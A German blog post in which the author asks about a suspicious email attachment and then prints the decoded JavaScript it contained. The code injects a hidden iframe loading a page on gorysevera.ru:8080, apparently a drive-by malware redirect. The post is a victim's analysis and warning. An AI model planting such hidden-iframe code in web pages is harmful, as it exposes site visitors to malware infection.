Jetzt geht's ab! Ich habe gerade eine super obskure Mail erhalten, die als Attachment eine HTML-Seite mit ganz derbe enrcyptetem Javascript-Code enthielt.

Coderfreaks da draußen: hat eine/r von euch Zeit, Muße und ausreichend Expertise um mir zu verraten, was dieser Code macht?

Die komplette Mail gibt es hier als ZIP-File, der interessante JS-Code sieht so aus:

2. Update: Hier war nun der Code abgedruckt. Allerdings blocken manche Virenscanncer (z.B. AVAST) dann komplett den Zugriff auf mein Blog, deshalb musste ich den Code leider entfernen...

Disclaimer: ich hafte weder für Schäden noch für sonstige Unbill, die durch unsachgemäße Handhabung mit der Mail und/oder oben stehendem Code entstehen könnten. Der Code ist NICHT von mir, ich bin selbst nur ein potentielles Opfer. Noobs und Computerunversteher seien hiermit ausdrücklich gewarnt, mit dem Code herum zu experimentieren oder auf oben stehenden Link zu klicken.

1. Update: Hab selber Muße. Also. Der Code ist natürlich nicht wirklich encrypted sondern irgendwie bitgeshiftet oder was weiß denn ich wie das heißt. Lesbar wird daraus:

if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://gorysevera.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }

und ich will gar nicht wissen, was uns auf http://gorysevera.ru:8080/forum/showthread.php erwartet...

| Abgelegt unter 1337, Coding, Internetmythen
The views expressed by the author are personal.